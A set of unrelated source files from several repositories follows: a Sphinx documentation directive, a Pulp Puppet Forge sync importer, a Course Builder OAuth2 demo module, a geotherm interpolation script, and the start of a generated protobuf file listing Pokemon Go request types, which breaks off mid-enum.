# add a title (the language name) before each block
#targetid = "configuration-block-%d" % env.new_serialno('configuration-block')
#targetnode = nodes.target('', '', ids=[targetid])
#targetnode.append(child)
innernode = nodes.emphasis(self.formats[child['language']], self.formats[child['language']])
para = nodes.paragraph()
para += [innernode, child]
entry = nodes.list_item('')
entry.append(para)
entries.append(entry)
resultnode = configurationblock()
resultnode.append(nodes.bullet_list('', *entries))
return [resultnode]
def visit_configurationblock_html(self, node):
self.body.append(self.starttag(node, 'div', CLASS='configuration-block'))
def depart_configurationblock_html(self, node):
self.body.append('</div>\n')
def visit_configurationblock_latex(self, node):
pass
def depart_configurationblock_latex(self, node):
pass
def setup(app):
app.add_node(configurationblock,
html=(visit_configurationblock_html, depart_configurationblock_html),
latex=(visit_configurationblock_latex, depart_configurationblock_latex))
app.add_directive('configuration-block', ConfigurationBlock)
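# Illustrative use of the registered directive from a .rst source file (a
# sketch; the YAML/XML snippets are hypothetical, but each child must be a
# code-block whose language appears in ConfigurationBlock.formats):
#
#   .. configuration-block::
#
#       .. code-block:: yaml
#
#           doctrine:
#               auto_mapping: true
#
#       .. code-block:: xml
#
#           <doctrine:config auto-mapping="true" />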
|
jeremycline/pulp_puppet
|
refs/heads/master
|
pulp_puppet_plugins/pulp_puppet/plugins/importers/forge.py
|
1
|
from datetime import datetime
from gettext import gettext as _
import logging
import os
import shutil
import sys
from pulp.common.util import encode_unicode
from pulp.server.db.model.criteria import UnitAssociationCriteria
from pulp_puppet.common import constants
from pulp_puppet.common.constants import (STATE_FAILED, STATE_RUNNING,
STATE_SUCCESS, STATE_CANCELED)
from pulp_puppet.common.model import RepositoryMetadata, Module
from pulp_puppet.common.sync_progress import SyncProgressReport
from pulp_puppet.plugins.importers import metadata as metadata_module
from pulp_puppet.plugins.importers.downloaders import factory as downloader_factory
_logger = logging.getLogger(__name__)
class SynchronizeWithPuppetForge(object):
"""
Used to perform a single sync of a puppet repository. This class will
maintain state relevant to the run and should not be reused across runs.
"""
def __init__(self, repo, sync_conduit, config):
self.repo = repo
self.sync_conduit = sync_conduit
self.config = config
self.progress_report = SyncProgressReport(sync_conduit)
self.downloader = None
        # Since SynchronizeWithPuppetForge creates a Nectar downloader for each unit, we cannot
# rely on telling the current downloader to cancel. Therefore, we need another state tracker
# to check in the download units loop.
self._canceled = False
def __call__(self):
"""
Performs the sync operation according to the configured state of the
instance. The report to be sent back to Pulp is returned from this
call. This call will make calls into the conduit's progress update
as appropriate.
This call executes serially. No threads are created by this call. It
will not return until either a step fails or the entire sync is
completed.
:return: the report object to return to Pulp from the sync call
:rtype: SyncProgressReport
"""
_logger.info('Beginning sync for repository <%s>' % self.repo.id)
# quit now if there is no feed URL defined
if not self.config.get(constants.CONFIG_FEED):
self.progress_report.metadata_state = STATE_FAILED
self.progress_report.metadata_error_message = _(
'Cannot perform repository sync on a repository with no feed')
self.progress_report.update_progress()
return self.progress_report.build_final_report()
try:
metadata = self._parse_metadata()
if not metadata:
report = self.progress_report.build_final_report()
return report
self._import_modules(metadata)
finally:
# One final progress update before finishing
self.progress_report.update_progress()
return self.progress_report
def cancel(self):
"""
Cancel an in-progress sync, if there is one.
"""
self._canceled = True
if self.downloader is None:
return
self.downloader.cancel()
def _parse_metadata(self):
"""
Takes the necessary actions (according to the run configuration) to
retrieve and parse the repository's metadata. This call will return
either the successfully parsed metadata or None if it could not
be retrieved or parsed. The progress report will be updated with the
appropriate description of what went wrong in the event of an error,
        so the caller should interpret a None return as an error occurring and
not continue the sync.
:return: object representation of the metadata
:rtype: RepositoryMetadata
"""
_logger.info('Beginning metadata retrieval for repository <%s>' % self.repo.id)
self.progress_report.metadata_state = STATE_RUNNING
self.progress_report.update_progress()
start_time = datetime.now()
# Retrieve the metadata from the source
try:
downloader = self._create_downloader()
self.downloader = downloader
metadata_json_docs = downloader.retrieve_metadata(self.progress_report)
except Exception, e:
if self._canceled:
_logger.warn('Exception occurred on canceled metadata download: %s' % e)
self.progress_report.metadata_state = STATE_CANCELED
return None
_logger.exception('Exception while retrieving metadata for repository <%s>' % self.repo.id)
self.progress_report.metadata_state = STATE_FAILED
self.progress_report.metadata_error_message = _('Error downloading metadata')
self.progress_report.metadata_exception = e
self.progress_report.metadata_traceback = sys.exc_info()[2]
end_time = datetime.now()
duration = end_time - start_time
self.progress_report.metadata_execution_time = duration.seconds
self.progress_report.update_progress()
return None
finally:
self.downloader = None
# Parse the retrieved metadata documents
try:
metadata = RepositoryMetadata()
for doc in metadata_json_docs:
metadata.update_from_json(doc)
except Exception, e:
_logger.exception('Exception parsing metadata for repository <%s>' % self.repo.id)
self.progress_report.metadata_state = STATE_FAILED
self.progress_report.metadata_error_message = _('Error parsing repository modules metadata document')
self.progress_report.metadata_exception = e
self.progress_report.metadata_traceback = sys.exc_info()[2]
end_time = datetime.now()
duration = end_time - start_time
self.progress_report.metadata_execution_time = duration.seconds
self.progress_report.update_progress()
return None
# Last update to the progress report before returning
self.progress_report.metadata_state = STATE_SUCCESS
end_time = datetime.now()
duration = end_time - start_time
self.progress_report.metadata_execution_time = duration.seconds
self.progress_report.update_progress()
return metadata
def _import_modules(self, metadata):
"""
Imports each module in the repository into Pulp.
This method is mostly just a wrapper on top of the actual logic
of performing an import to set the stage for the progress report and
more importantly catch any rogue exceptions that crop up.
:param metadata: object representation of the repository metadata
containing the modules to import
:type metadata: RepositoryMetadata
"""
_logger.info('Retrieving modules for repository <%s>' % self.repo.id)
self.progress_report.modules_state = STATE_RUNNING
# Do not send the update about the state yet. The counts need to be
# set later once we know how many are new, so to prevent a situation
        # where the report reflects running but does not have counts, wait
# until they are populated before sending the update to Pulp.
start_time = datetime.now()
# Perform the actual logic
try:
self._do_import_modules(metadata)
except Exception, e:
_logger.exception('Exception importing modules for repository <%s>' % self.repo.id)
self.progress_report.modules_state = STATE_FAILED
self.progress_report.modules_error_message = _('Error retrieving modules')
self.progress_report.modules_exception = e
self.progress_report.modules_traceback = sys.exc_info()[2]
end_time = datetime.now()
duration = end_time - start_time
self.progress_report.modules_execution_time = duration.seconds
self.progress_report.update_progress()
return
# Last update to the progress report before returning
self.progress_report.modules_state = STATE_SUCCESS
end_time = datetime.now()
duration = end_time - start_time
self.progress_report.modules_execution_time = duration.seconds
self.progress_report.update_progress()
def _do_import_modules(self, metadata):
"""
Actual logic of the import. This method will do a best effort per module;
if an individual module fails it will be recorded and the import will
continue. This method will only raise an exception in an extreme case
where it cannot react and continue.
"""
def unit_key_str(unit_key_dict):
"""
Converts the unit key dict form into a single string that can be
used as the key in a dict lookup.
"""
template = '%s-%s-%s'
return template % (encode_unicode(unit_key_dict['name']),
encode_unicode(unit_key_dict['version']),
encode_unicode(unit_key_dict['author']))
downloader = self._create_downloader()
self.downloader = downloader
# Ease lookup of modules
modules_by_key = dict([(unit_key_str(m.unit_key()), m) for m in metadata.modules])
# Collect information about the repository's modules before changing it
module_criteria = UnitAssociationCriteria(type_ids=[constants.TYPE_PUPPET_MODULE])
existing_units = self.sync_conduit.get_units(criteria=module_criteria)
existing_modules = [Module.from_unit(x) for x in existing_units]
existing_module_keys = [unit_key_str(m.unit_key()) for m in existing_modules]
new_unit_keys = self._resolve_new_units(existing_module_keys, modules_by_key.keys())
remove_unit_keys = self._resolve_remove_units(existing_module_keys, modules_by_key.keys())
# Once we know how many things need to be processed, we can update the
# progress report
self.progress_report.modules_total_count = len(new_unit_keys)
self.progress_report.modules_finished_count = 0
self.progress_report.modules_error_count = 0
self.progress_report.update_progress()
# Add new units
for key in new_unit_keys:
if self._canceled:
break
module = modules_by_key[key]
try:
self._add_new_module(downloader, module)
self.progress_report.modules_finished_count += 1
except Exception, e:
self.progress_report.add_failed_module(module, e, sys.exc_info()[2])
self.progress_report.update_progress()
# Remove missing units if the configuration indicates to do so
if self._should_remove_missing():
existing_units_by_key = {}
for u in existing_units:
unit_key = Module.generate_unit_key(u.unit_key['name'], u.unit_key['version'], u.unit_key['author'])
s = unit_key_str(unit_key)
existing_units_by_key[s] = u
for key in remove_unit_keys:
doomed = existing_units_by_key[key]
self.sync_conduit.remove_unit(doomed)
self.downloader = None
def _add_new_module(self, downloader, module):
"""
Performs the tasks for downloading and saving a new unit in Pulp.
:param downloader: downloader instance to use for retrieving the unit
:param module: module instance to download
:type module: Module
"""
# Initialize the unit in Pulp
type_id = constants.TYPE_PUPPET_MODULE
unit_key = module.unit_key()
unit_metadata = {} # populated later but needed for the init call
relative_path = constants.STORAGE_MODULE_RELATIVE_PATH % module.filename()
unit = self.sync_conduit.init_unit(type_id, unit_key, unit_metadata,
relative_path)
try:
if not self._module_exists(unit.storage_path):
# Download the bits
downloaded_filename = downloader.retrieve_module(self.progress_report, module)
# Copy them to the final location
shutil.copy(downloaded_filename, unit.storage_path)
# Extract the extra metadata into the module
metadata_json = metadata_module.extract_metadata(unit.storage_path, self.repo.working_dir)
module = Module.from_json(metadata_json)
# Update the unit with the extracted metadata
unit.metadata.update(module.unit_metadata())
# Save the unit and associate it to the repository
self.sync_conduit.save_unit(unit)
finally:
# Clean up the temporary module
downloader.cleanup_module(module)
def _module_exists(self, filename):
"""
Determines if the module at the given filename is already downloaded.
:param filename: full path to the module in Pulp
:type filename: str
:return: true if the module file already exists; false otherwise
:rtype: bool
"""
return os.path.exists(filename)
def _resolve_new_units(self, existing_unit_keys, found_unit_keys):
"""
Returns a list of unit keys that are new to the repository.
:return: list of unit keys; empty list if none are new
:rtype: list
"""
return list(set(found_unit_keys) - set(existing_unit_keys))
def _resolve_remove_units(self, existing_unit_keys, found_unit_keys):
"""
Returns a list of unit keys that are in the repository but not in
the current repository metadata.
:return: list of unit keys; empty list if none have been removed
:rtype: list
"""
return list(set(existing_unit_keys) - set(found_unit_keys))
def _create_downloader(self):
"""
        Uses the configuration to determine which downloader style to use
for this run.
:return: one of the *Downloader classes in the downloaders module
"""
feed = self.config.get(constants.CONFIG_FEED)
downloader = downloader_factory.get_downloader(feed, self.repo, self.sync_conduit, self.config)
return downloader
def _should_remove_missing(self):
"""
Returns whether or not missing units should be removed.
:return: true if missing units should be removed; false otherwise
:rtype: bool
"""
if constants.CONFIG_REMOVE_MISSING not in self.config.keys():
return constants.DEFAULT_REMOVE_MISSING
else:
return self.config.get_boolean(constants.CONFIG_REMOVE_MISSING)
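# Illustrative call pattern (a sketch; the repo, sync_conduit, and config
# objects are supplied by Pulp's importer plugin API):
#
#   sync = SynchronizeWithPuppetForge(repo, sync_conduit, config)
#   report = sync()  # runs serially and returns a SyncProgressReport
#   sync.cancel()    # may be called from another thread to stop a running sync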
|
ehiller/mobilecsp-v18
|
refs/heads/master
|
modules/oauth2/oauth2.py
|
3
|
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Oauth2 module implementation.
In order to use this module with your app you must enable it in main.py by
changing
modules.oauth2.oauth2.register_module()
to
modules.oauth2.oauth2.register_module().enable()
Additionally, you must:
1. Visit https://code.google.com/apis/console. Click on API Access and create a
client id for your web app with redirect URI set to:
https://<appid>.appspot|googleplex.com/<callback_uri>
and optionally include
http://localhost:<port>/<callback_uri>
where <appid> is your app id, <callback_uri> is the oauth2 callback URI you'd
like to use, and <port> is the port you'd like to use for localhost. You can
set <port> and <callback_uri> to basically whatever you want as long as they
are unique.
2. Once you've created the client id, click Download JSON. Take the file you get
and overwrite client_secrets.json in this directory.
3. In https://code.google.com/apis/console, click on Services and enable the
services your app requires. For these demos, you'll need to enable Drive API
and Google+.
Whenever you change scopes you'll need to revoke your access tokens. You can do
this at https://accounts.google.com/b/0/IssuedAuthSubTokens.
You can find a list of the available APIs at
http://api-python-client-doc.appspot.com/.
Finally, a note about dependencies. Oauth2 requires google-api-python-client,
which you can find at https://code.google.com/p/google-api-python-client/. We
bundle version 1.1 with Course Builder. It requires httplib2, which you can find
at https://code.google.com/p/httplib2/. We bundle version 0.8 with Course
Builder.
It also requires python-gflags from https://code.google.com/p/python-gflags/. We
bundle 2.0 with Course Builder, and we've repackaged the downloadable .tar.gz as
a .zip so Python can load its contents directly from sys.path.
Good luck!
"""
__author__ = [
'johncox@google.com (John Cox)',
]
import os
import traceback
from apiclient import discovery
from oauth2client import appengine
import webapp2
from common import jinja_utils
from common import safe_dom
from models import custom_modules
# In real life we'd check in a blank file and set up the code to error with a
# message pointing people to https://code.google.com/apis/console.
_CLIENTSECRETS_JSON_PATH = os.path.join(
os.path.dirname(__file__), 'client_secrets.json')
_TEMPLATES_DIR = os.path.join(os.path.dirname(__file__), 'templates')
class _ErrorDecorator(object):
"""Decorator used when a real decorator cannot be created.
Most often this is because there is no valid client_secrets.json. This
decorator replaces the wrapped method with one that either is a no-op, or,
if an error was given, displays the error.
"""
def __init__(self, **kwargs):
self.callback_path = 'not_enabled'
self.error = kwargs.pop('error', '')
def callback_handler(self):
"""Stub for API compatibility."""
pass
def oauth_required(self, unused_method):
"""Prints an error messsage and exits with a 500."""
def print_error_and_return_500(
request_handler, *unused_args, **unused_kwargs):
contents = safe_dom.NodeList().append(
safe_dom.Element('h1').add_text('500 internal server error')
).append(
safe_dom.Element('pre').add_text(self.error)
)
request_handler.response.write(contents.sanitized)
request_handler.response.status = 500
return print_error_and_return_500
# In real life we'd want to make one decorator per service because we wouldn't
# want users to have to give so many permissions.
def _build_decorator():
"""Builds a decorator for using oauth2 with webapp2.RequestHandlers."""
try:
return appengine.oauth2decorator_from_clientsecrets(
_CLIENTSECRETS_JSON_PATH,
scope=[
'https://www.googleapis.com/auth/drive.readonly',
'https://www.googleapis.com/auth/plus.login',
'https://www.googleapis.com/auth/userinfo.email',
'https://www.googleapis.com/auth/userinfo.profile',
],
message='client_secrets.json missing')
# Deliberately catch everything. pylint: disable=broad-except
except Exception as e:
display_error = (
'oauth2 module enabled, but unable to load client_secrets.json. '
'See docs in modules/oauth2.py. Original exception was:\n\n%s') % (
traceback.format_exc(e))
return _ErrorDecorator(error=display_error)
_DECORATOR = _build_decorator()
class ServiceHandler(webapp2.RequestHandler):
def build_service(self, oauth2_decorator, name, version):
http = oauth2_decorator.credentials.authorize(oauth2_decorator.http())
return discovery.build(name, version, http=http)
class _ExampleHandler(ServiceHandler):
def _write_result(self, service_name, result):
template = jinja_utils.get_template('result.html', [_TEMPLATES_DIR])
self.response.out.write(template.render({
'service_name': service_name,
'result': result,
}))
class GoogleDriveHandler(_ExampleHandler):
@_DECORATOR.oauth_required
def get(self):
drive = self.build_service(_DECORATOR, 'drive', 'v2')
about = drive.about().get().execute()
self._write_result('Drive', about['user']['displayName'])
class GoogleOauth2Handler(_ExampleHandler):
@_DECORATOR.oauth_required
def get(self):
oauth2 = self.build_service(_DECORATOR, 'oauth2', 'v2')
userinfo = oauth2.userinfo().get().execute()
self._write_result('Oauth2', userinfo['name'])
class GooglePlusHandler(_ExampleHandler):
@_DECORATOR.oauth_required
def get(self):
plus = self.build_service(_DECORATOR, 'plus', 'v1')
# This call will barf if you're logged in as @google.com because your
# profile will not be fetchable. Log in as @gmail.com and you'll be
# fine.
me = plus.people().get(userId='me').execute()
self._write_result('Plus', me['displayName'])
# None or custom_modules.Module. Placeholder for the module created by
# register_module.
module = None
def register_module():
"""Adds this module to the registry."""
global module # pylint: disable=global-statement
handlers = [
('/oauth2_google_drive', GoogleDriveHandler),
('/oauth2_google_oauth2', GoogleOauth2Handler),
('/oauth2_google_plus', GooglePlusHandler),
(_DECORATOR.callback_path, _DECORATOR.callback_handler()),
]
module = custom_modules.Module('Oauth2', 'Oauth2 pages', handlers, [])
return module
|
tjhei/burnman_old
|
refs/heads/master
|
geotherm.py
|
1
|
import numpy
import bisect
import matplotlib.pyplot as pyplot
import prem
from tools import *
# loads a simple geotherm from geotherm.txt
# geotherm from geotherm.txt, from Cayman
# pressure: in GPa
# return: temperature in K
def geotherm(pressure):
idx = bisect.bisect_left(table_p, pressure) - 1
if (idx < 0):
return table_T[0]
elif (idx < len(table_p)-1):
return linear_interpol(pressure, table_p[idx], table_p[idx+1], table_T[idx], table_T[idx+1])
else:
return table_T[idx]
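# linear_interpol is imported from tools; a minimal sketch of the assumed
# behavior, inferred from the call sites in this file:
#
#   def linear_interpol(x, x1, x2, y1, y2):
#       return y1 + (y2 - y1) * (x - x1) / (x2 - x1)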
# polynomial fit from Watson, Baxter, EPSL, 2007
# pressure: in GPa
# return: temperature in K
def geotherm_formula(pressure):
if (pressure <= 15):
return 1900-1420*pow(0.8,pressure)
else:
return 1680+11.1*pressure
# geotherm from Brown81
def geotherm_brown(pressure):
depth = 6371. - prem.prem_radius(pressure)
idx = bisect.bisect_left(table_brown_depth, depth) - 1
if (idx < 0):
return table_brown[0][1]
elif (idx < len(table_brown)-1):
return linear_interpol(depth, table_brown_depth[idx], table_brown_depth[idx+1], table_brown[idx][1], table_brown[idx+1][1])
else:
return table_brown[idx][1]
table_brown = read_table("data/brown_81.txt")
table_brown_depth = numpy.array(table_brown)[:,0]
geotherm_table = read_table("data/geotherm.txt")
geotherm_table = sort_table(geotherm_table, 0)
table_p=numpy.array(geotherm_table)[:,0]
table_T=numpy.array(geotherm_table)[:,1]
# test geotherm
if __name__ == "__main__":
p = numpy.arange(1.0,128.0,3)
t = [geotherm(y) for y in p]
t2 = [geotherm_formula(y) for y in p]
t3 = [geotherm_brown(y) for y in p]
p1,=pyplot.plot(p,t,'+-')
p2,=pyplot.plot(p,t2,'x--r')
p3,=pyplot.plot(p,t3,'*-g')
pyplot.xlim(25,135)
pyplot.ylim(1600,3100)
pyplot.legend([p1,p2,p3],["cayman", "watson", "brown"], loc=4)
pyplot.show()
|
waiyin21/test123
|
refs/heads/master
|
pogom/pgoapi/protos/POGOProtos/Networking/Requests_pb2.py
|
8
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos.Networking.Requests.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos.Networking.Requests.proto',
package='POGOProtos.Networking.Requests',
syntax='proto3',
serialized_pb=_b('\n$POGOProtos.Networking.Requests.proto\x12\x1ePOGOProtos.Networking.Requests\"e\n\x07Request\x12\x41\n\x0crequest_type\x18\x01 \x01(\x0e\x32+.POGOProtos.Networking.Requests.RequestType\x12\x17\n\x0frequest_message\x18\x02 \x01(\x0c*\xc1\x0c\n\x0bRequestType\x12\x10\n\x0cMETHOD_UNSET\x10\x00\x12\x11\n\rPLAYER_UPDATE\x10\x01\x12\x0e\n\nGET_PLAYER\x10\x02\x12\x11\n\rGET_INVENTORY\x10\x04\x12\x15\n\x11\x44OWNLOAD_SETTINGS\x10\x05\x12\x1b\n\x17\x44OWNLOAD_ITEM_TEMPLATES\x10\x06\x12\"\n\x1e\x44OWNLOAD_REMOTE_CONFIG_VERSION\x10\x07\x12\x0f\n\x0b\x46ORT_SEARCH\x10\x65\x12\r\n\tENCOUNTER\x10\x66\x12\x11\n\rCATCH_POKEMON\x10g\x12\x10\n\x0c\x46ORT_DETAILS\x10h\x12\x0c\n\x08ITEM_USE\x10i\x12\x13\n\x0fGET_MAP_OBJECTS\x10j\x12\x17\n\x13\x46ORT_DEPLOY_POKEMON\x10n\x12\x17\n\x13\x46ORT_RECALL_POKEMON\x10o\x12\x13\n\x0fRELEASE_POKEMON\x10p\x12\x13\n\x0fUSE_ITEM_POTION\x10q\x12\x14\n\x10USE_ITEM_CAPTURE\x10r\x12\x11\n\rUSE_ITEM_FLEE\x10s\x12\x13\n\x0fUSE_ITEM_REVIVE\x10t\x12\x10\n\x0cTRADE_SEARCH\x10u\x12\x0f\n\x0bTRADE_OFFER\x10v\x12\x12\n\x0eTRADE_RESPONSE\x10w\x12\x10\n\x0cTRADE_RESULT\x10x\x12\x16\n\x12GET_PLAYER_PROFILE\x10y\x12\x11\n\rGET_ITEM_PACK\x10z\x12\x11\n\rBUY_ITEM_PACK\x10{\x12\x10\n\x0c\x42UY_GEM_PACK\x10|\x12\x12\n\x0e\x45VOLVE_POKEMON\x10}\x12\x14\n\x10GET_HATCHED_EGGS\x10~\x12\x1f\n\x1b\x45NCOUNTER_TUTORIAL_COMPLETE\x10\x7f\x12\x15\n\x10LEVEL_UP_REWARDS\x10\x80\x01\x12\x19\n\x14\x43HECK_AWARDED_BADGES\x10\x81\x01\x12\x11\n\x0cUSE_ITEM_GYM\x10\x85\x01\x12\x14\n\x0fGET_GYM_DETAILS\x10\x86\x01\x12\x15\n\x10START_GYM_BATTLE\x10\x87\x01\x12\x0f\n\nATTACK_GYM\x10\x88\x01\x12\x1b\n\x16RECYCLE_INVENTORY_ITEM\x10\x89\x01\x12\x18\n\x13\x43OLLECT_DAILY_BONUS\x10\x8a\x01\x12\x16\n\x11USE_ITEM_XP_BOOST\x10\x8b\x01\x12\x1b\n\x16USE_ITEM_EGG_INCUBATOR\x10\x8c\x01\x12\x10\n\x0bUSE_INCENSE\x10\x8d\x01\x12\x18\n\x13GET_INCENSE_POKEMON\x10\x8e\x01\x12\x16\n\x11INCENSE_ENCOUNTER\x10\x8f\x01\x12\x16\n\x11\x41\x44\x44_FORT_MODIFIER\x10\x90\x01\x12\x13\n\x0e\x44ISK_ENCOUNTER\x10\x91\x01\x12!\n\x1c\x43OLLECT_DAILY_DEFENDER_BONUS\x10\x92\x01\x12\x14\n\x0fUPGRADE_POKEMON\x10\x93\x01\x12\x19\n\x14SET_FAVORITE_POKEMON\x10\x94\x01\x12\x15\n\x10NICKNAME_POKEMON\x10\x95\x01\x12\x10\n\x0b\x45QUIP_BADGE\x10\x96\x01\x12\x19\n\x14SET_CONTACT_SETTINGS\x10\x97\x01\x12\x15\n\x10GET_ASSET_DIGEST\x10\xac\x02\x12\x16\n\x11GET_DOWNLOAD_URLS\x10\xad\x02\x12\x1c\n\x17GET_SUGGESTED_CODENAMES\x10\x91\x03\x12\x1d\n\x18\x43HECK_CODENAME_AVAILABLE\x10\x92\x03\x12\x13\n\x0e\x43LAIM_CODENAME\x10\x93\x03\x12\x0f\n\nSET_AVATAR\x10\x94\x03\x12\x14\n\x0fSET_PLAYER_TEAM\x10\x95\x03\x12\x1b\n\x16MARK_TUTORIAL_COMPLETE\x10\x96\x03\x12\x16\n\x11LOAD_SPAWN_POINTS\x10\xf4\x03\x12\t\n\x04\x45\x43HO\x10\x9a\x05\x12\x1b\n\x16\x44\x45\x42UG_UPDATE_INVENTORY\x10\xbc\x05\x12\x18\n\x13\x44\x45\x42UG_DELETE_PLAYER\x10\xbd\x05\x12\x17\n\x12SFIDA_REGISTRATION\x10\xa0\x06\x12\x15\n\x10SFIDA_ACTION_LOG\x10\xa1\x06\x12\x18\n\x13SFIDA_CERTIFICATION\x10\xa2\x06\x12\x11\n\x0cSFIDA_UPDATE\x10\xa3\x06\x12\x11\n\x0cSFIDA_ACTION\x10\xa4\x06\x12\x11\n\x0cSFIDA_DOWSER\x10\xa5\x06\x12\x12\n\rSFIDA_CAPTURE\x10\xa6\x06\x62\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_REQUESTTYPE = _descriptor.EnumDescriptor(
name='RequestType',
full_name='POGOProtos.Networking.Requests.RequestType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='METHOD_UNSET', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PLAYER_UPDATE', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_PLAYER', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_INVENTORY', index=3, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DOWNLOAD_SETTINGS', index=4, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DOWNLOAD_ITEM_TEMPLATES', index=5, number=6,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DOWNLOAD_REMOTE_CONFIG_VERSION', index=6, number=7,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FORT_SEARCH', index=7, number=101,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ENCOUNTER', index=8, number=102,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CATCH_POKEMON', index=9, number=103,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FORT_DETAILS', index=10, number=104,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ITEM_USE', index=11, number=105,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_MAP_OBJECTS', index=12, number=106,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FORT_DEPLOY_POKEMON', index=13, number=110,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FORT_RECALL_POKEMON', index=14, number=111,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='RELEASE_POKEMON', index=15, number=112,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='USE_ITEM_POTION', index=16, number=113,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='USE_ITEM_CAPTURE', index=17, number=114,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='USE_ITEM_FLEE', index=18, number=115,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='USE_ITEM_REVIVE', index=19, number=116,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TRADE_SEARCH', index=20, number=117,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TRADE_OFFER', index=21, number=118,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TRADE_RESPONSE', index=22, number=119,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TRADE_RESULT', index=23, number=120,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_PLAYER_PROFILE', index=24, number=121,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_ITEM_PACK', index=25, number=122,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BUY_ITEM_PACK', index=26, number=123,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BUY_GEM_PACK', index=27, number=124,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EVOLVE_POKEMON', index=28, number=125,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_HATCHED_EGGS', index=29, number=126,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ENCOUNTER_TUTORIAL_COMPLETE', index=30, number=127,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LEVEL_UP_REWARDS', index=31, number=128,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CHECK_AWARDED_BADGES', index=32, number=129,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='USE_ITEM_GYM', index=33, number=133,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_GYM_DETAILS', index=34, number=134,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='START_GYM_BATTLE', index=35, number=135,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ATTACK_GYM', index=36, number=136,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='RECYCLE_INVENTORY_ITEM', index=37, number=137,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='COLLECT_DAILY_BONUS', index=38, number=138,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='USE_ITEM_XP_BOOST', index=39, number=139,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='USE_ITEM_EGG_INCUBATOR', index=40, number=140,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='USE_INCENSE', index=41, number=141,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_INCENSE_POKEMON', index=42, number=142,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INCENSE_ENCOUNTER', index=43, number=143,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ADD_FORT_MODIFIER', index=44, number=144,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DISK_ENCOUNTER', index=45, number=145,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='COLLECT_DAILY_DEFENDER_BONUS', index=46, number=146,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UPGRADE_POKEMON', index=47, number=147,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SET_FAVORITE_POKEMON', index=48, number=148,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NICKNAME_POKEMON', index=49, number=149,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EQUIP_BADGE', index=50, number=150,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SET_CONTACT_SETTINGS', index=51, number=151,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_ASSET_DIGEST', index=52, number=300,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_DOWNLOAD_URLS', index=53, number=301,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_SUGGESTED_CODENAMES', index=54, number=401,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CHECK_CODENAME_AVAILABLE', index=55, number=402,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CLAIM_CODENAME', index=56, number=403,
